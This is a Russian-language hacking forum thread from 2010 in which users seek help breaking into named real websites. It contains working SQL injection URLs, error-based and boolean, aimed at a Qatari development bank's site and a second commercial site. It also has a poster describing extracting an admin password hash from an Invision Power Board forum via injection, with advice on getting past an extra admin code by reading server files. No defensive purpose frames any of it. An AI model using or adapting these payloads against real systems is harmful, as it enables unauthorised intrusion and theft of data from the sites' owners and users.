04.04.2010, 21:05
|
|
Динозавр
Регистрация: 10.01.2008
Сообщений: 2,841
С нами:
9649706
Репутация:
3338
|
|
Сообщение от Nek1t
Так через perl test.pl все работает, так что, думаю, не в правах дело.
Нет, нету. Да и каталог-то, в который я могу писАть, всего один.
не путай perl test.pl и запуск perl-скрипта из веба, абсолютно разные вещи.
PS: perl test.pl будет работать в любых .*nix, если админ не изврашенец
|
|
|
04.04.2010, 21:21
|
|
Участник форума
Регистрация: 07.03.2008
Сообщений: 141
С нами:
9567396
Репутация:
23
|
|
ручками полазить/посмотреть
Ручками я и сейчас могу через passthru(), но на это уйдет много времени. ls, cat и т.д. - это, конечно, гибко, но не удобно.
|
|
|
|
04.04.2010, 22:49
|
|
Участник форума
Регистрация: 19.08.2009
Сообщений: 115
С нами:
8803961
Репутация:
8
|
|
Подскажите можно ли здесь подобрать:
http://www.qatardevbank.com/ar/viewsubs.php?id=-2+order+by+5+--+
http://www.qatardevbank.com/ar/viewsubs.php?id=(select+1+from+(select+count(0),co ncat((select+version()),floor(rand(0)*2))+from+(se lect+1+union+select+2+union+select+3+union+select+ 3+union+select+3+union+select+3+union+select+3+uni on+select+3+union+select+3+union+select+3+union+se lect+3+union+select+3+union+select+3)x+group+by+2+ limit+1)a)+--+
http://www.qatardevbank.com/ar/viewsubs.php?id=-2+and+(select*from(select+count(*)from(select+1+un ion+select+2+union+select+3)x+group+by+concat(mid( (select+TABLE_NAME+from+INFORMATION_SCHEMA.TABLES+ limit+1,1),1,64),floor(rand(0)*2)))z)+--+
|
|
|
|
04.04.2010, 23:03
|
|
Динозавр
Регистрация: 10.01.2008
Сообщений: 2,841
С нами:
9649706
Репутация:
3338
|
|
Сообщение от FlaktW
Подскажите можно ли здесь подобрать:
http://www.qatardevbank.com/ar/viewsubs.php?id=-2+order+by+5+--+
http://www.qatardevbank.com/ar/viewsubs.php?id=(select+1+from+(select+count(0),co ncat((select+version()),floor(rand(0)*2))+from+(se lect+1+union+select+2+union+select+3+union+select+ 3+union+select+3+union+select+3+union+select+3+uni on+select+3+union+select+3+union+select+3+union+se lect+3+union+select+3+union+select+3)x+group+by+2+ limit+1)a)+--+
http://www.qatardevbank.com/ar/viewsubs.php?id=-2+and+(select*from(select+count(*)from(select+1+un ion+select+2+union+select+3)x+group+by+concat(mid( (select+TABLE_NAME+from+INFORMATION_SCHEMA.TABLES+ limit+1,1),1,64),floor(rand(0)*2)))z)+--+
Код:
http://www.qatardevbank.com/ar/viewsubs.php?id=-2+or+1=1+and+substring(version(),1,1)=4
для начала
|
|
|
|
05.04.2010, 07:00
|
|
Участник форума
Регистрация: 24.08.2009
Сообщений: 172
С нами:
8797559
Репутация:
-16
|
|
http://ashtarakkat.com/en/products/showProduct/63/
и зделаю так..
http://ashtarakkat.com/en/products/showProduct/63%27
скаjите поjaлуста ето sql ??
и как зделать ?
|
|
|
|
05.04.2010, 09:47
|
|
Познавший АНТИЧАТ
Регистрация: 31.03.2006
Сообщений: 1,167
С нами:
10585560
Репутация:
1550
|
|
Вопрос знатокам: есть форум ибф Powered by*Invision Power Board(U) v1.3 Final © 2003 *IPS, Inc.
Русский Модифицированный IPB v1.3 Final © 2003*BesTFileZ.Net*&*IBR Team*.Через скулю нашел хеш админа, выполняю вход, и потом когда хочу зайти в админку мне помимо пароля просит ввести еще личный код админа.Собственно и сам вопрос где в базе хранитыса данный код? и если хранится он в базе.
|
|
|
|
05.04.2010, 11:20
|
|
Постоянный
Регистрация: 25.01.2009
Сообщений: 368
С нами:
9100556
Репутация:
912
|
|
Сообщение от Gorev
Вопрос знатокам: есть форум ибф Powered by*Invision Power Board(U) v1.3 Final © 2003 *IPS, Inc.
Русский Модифицированный IPB v1.3 Final © 2003*BesTFileZ.Net*&*IBR Team*.Через скулю нашел хеш админа, выполняю вход, и потом когда хочу зайти в админку мне помимо пароля просит ввести еще личный код админа.Собственно и сам вопрос где в базе хранитыса данный код? и если хранится он в базе.
Тоже встречал такое.. Админы ставлят на админку еще бейс авторизацию и зачастую логин и пасс находится НЕ в бд. Если FILE_PRIV: Y , то читай файлы админки
|
|
|
|
05.04.2010, 11:58
|
|
Познавший АНТИЧАТ
Регистрация: 31.03.2006
Сообщений: 1,167
С нами:
10585560
Репутация:
1550
|
|
Сообщение от .:[melkiy]:.
Тоже встречал такое.. Админы ставлят на админку еще бейс авторизацию и зачастую логин и пасс находится НЕ в бд. Если FILE_PRIV: Y , то читай файлы админки
вот именно что нет там бейс авторизации, просто еще одно поле добавилось в логинилке...
|
|
|
|
05.04.2010, 12:24
|
|
Участник форума
Регистрация: 26.07.2008
Сообщений: 267
С нами:
9364549
Репутация:
184
|
|
Скопируй точно какой код просит (и еще его id из сорса странички) и дай имя файла из адресной строки, а также имя файла, куда форма будет стучаться.
|
|
|
|
05.04.2010, 12:49
|
|
Познавший АНТИЧАТ
Регистрация: 31.03.2006
Сообщений: 1,167
С нами:
10585560
Репутация:
1550
|
|
да обычная логинилка в админку форума, только еще поле куда личный код админа надо вводить помимо пароля
PHP код:
<form action='http://forum.site.ru/admin.php?adsess=' method='post' name='theAdminForm' > <input type='hidden' name='adsess' value=''> <input type='hidden' name='login' value='yes'><div class='tableborder'> <div class='maintitle'>Требование авторизации</div> <table width='100%' cellspacing='0' cellpadding='5' align='center' border='0'><tr> </tr> <tr> <td class='tdrow1' width='40%' valign='middle'>Ваше имя:</td> <td class='tdrow2' width='60%' valign='middle'><input type='text' style='width:100%' name='username' value='Libra'></td> </tr> <tr> <td class='tdrow1' width='40%' valign='middle'>Ваш пароль:</td> <td class='tdrow2' width='60%' valign='middle'><input type='password' style='width:100%' name='password' value=''></td> </tr> <tr> <td class='tdrow1' width='40%' valign='middle'>Ваш личный код:</td> <td class='tdrow2' width='60%' valign='middle'><input type='password' style='width:100%' name='ppassword' value=''></td> </tr> <tr><td align='center' class='pformstrip' colspan='2' ><input type='submit' value='Войти' id='button' accesskey='s'></td></tr> </form></table></div><br />
|
|
|
|
|
 |
|
|
Здесь присутствуют: 1 (пользователей: 0 , гостей: 1)
|
|
|
|
![Аватар для .:[melkiy]:.](/avatars/avatar74910.jpg?2044349){kind=avatar}
Похожие темы
Комбинированный вид
